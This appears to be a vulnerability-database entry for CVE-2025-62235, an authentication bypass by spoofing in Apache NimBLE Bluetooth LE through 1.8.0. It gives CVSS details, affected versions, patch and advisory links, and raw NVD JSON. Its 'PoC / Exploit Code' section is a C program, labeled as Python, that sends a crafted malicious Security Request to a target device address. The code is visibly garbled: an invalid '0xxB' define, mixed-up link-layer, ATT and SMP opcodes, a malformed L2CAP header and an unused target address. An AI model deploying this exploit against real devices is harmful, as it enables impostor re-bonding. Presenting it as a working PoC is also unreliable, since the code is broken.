Security Vulnerability Report
中文
CVE-2025-62235 CVSS 8.1 HIGH

CVE-2025-62235

Published: 2026-01-10 10:15:51
Last Modified: 2026-01-14 17:45:58
Source: [email protected]

Description

Authentication Bypass by Spoofing vulnerability in Apache NimBLE. Receiving specially crafted Security Request could lead to removal of original bond and re-bond with impostor. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:* - VULNERABLE
Apache NimBLE <= 1.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62235 PoC - Apache NimBLE Authentication Bypass by Spoofing // This PoC demonstrates the vulnerability in NimBLE's Security Request handling #include <stdio.h> #include <stdlib.h> #include <string.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #define HCI_DEVICE 0 #define ATT_CID 4 // BLE PDU opcodes #define BLE_PKT_TYPE LL_SECURITY_REQ 0xxB // Malicious Security Request packet structure typedef struct { uint8_t opcode; // LL_SECURITY_REQ = 0x0B uint8_t auth_req; // Authentication requirements } __attribute__((packed)) security_req_pkt_t; int create_hci_socket() { int sock = hci_open_dev(HCI_DEVICE); if (sock < 0) { perror("Failed to open HCI device"); exit(1); } return sock; } void send_malicious_security_request(int sock, bdaddr_t *target_addr) { // Prepare malicious Security Request security_req_pkt_t sec_req = { .opcode = 0x0B, // LL_SECURITY_REQ opcode .auth_req = 0x05 // Bonding requested }; // Craft HCI ACL data packet uint8_t acl_packet[32]; memset(acl_packet, 0, sizeof(acl_packet)); // ACL header acl_packet[0] = 0x02; // ACL data packet acl_packet[1] = 0x00; // Handle low acl_packet[2] = 0x11; // Handle high (PB flag) // L2CAP header acl_packet[4] = 0x05; // Length low acl_packet[5] = 0x00; // Length high // ATT header acl_packet[6] = 0x06; // ATT Opcode: Security Request // Payload memcpy(&acl_packet[7], &sec_req, sizeof(sec_req)); printf("[*] Sending malicious Security Request to target...\n"); printf("[*] Opcode: 0x0B (LL_SECURITY_REQ)\n"); printf("[*] AuthReq: 0x05 (Bonding)\n"); // Send packet (requires raw HCI socket) if (write(sock, acl_packet, sizeof(acl_packet)) < 0) { perror("Failed to send packet"); } else { printf("[+] Malicious Security Request sent!\n"); printf("[*] This may trigger re-pairing if target is vulnerable\n"); } } int main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s <target_bdaddr>\n", argv[0]); printf("Example: %s 11:22:33:44:55:66\n", argv[0]); return 1; } int sock = create_hci_socket(); bdaddr_t target_addr; str2ba(argv[1], &target_addr); printf("========================================\n"); printf("CVE-2025-62235 PoC\n"); printf("Apache NimBLE Auth Bypass by Spoofing\n"); printf("========================================\n\n"); send_malicious_security_request(sock, &target_addr); hci_close_dev(sock); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62235", "sourceIdentifier": "[email protected]", "published": "2026-01-10T10:15:50.820", "lastModified": "2026-01-14T17:45:58.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass by Spoofing vulnerability in Apache NimBLE.\n\nReceiving specially crafted Security Request could lead to removal of original bond and re-bond with impostor.\nThis issue affects Apache NimBLE: through 1.8.0.\n\nUsers are recommended to upgrade to version 1.9.0, which fixes the issue."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación por suplantación en Apache NimBLE.\n\nRecibir una solicitud de seguridad especialmente diseñada podría conducir a la eliminación del enlace original y a un nuevo enlace con un impostor.\nEste problema afecta a Apache NimBLE: hasta la versión 1.8.0.\n\nSe recomienda a los usuarios actualizar a la versión 1.9.0, que corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.0", "matchCriteriaId": "DC033019-AA62-465E-AD0A-8018D8C89ED3"}]}]}], "references": [{"url": "https://github.com/apache/mynewt-nimble/commit/41f67e391e788c5feef9030026cc5cbc5431838a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://lists.apache.org/thread/rw2mrpfwb9d9wmq4h4b6ctcd6gpkk2ho", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/08/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.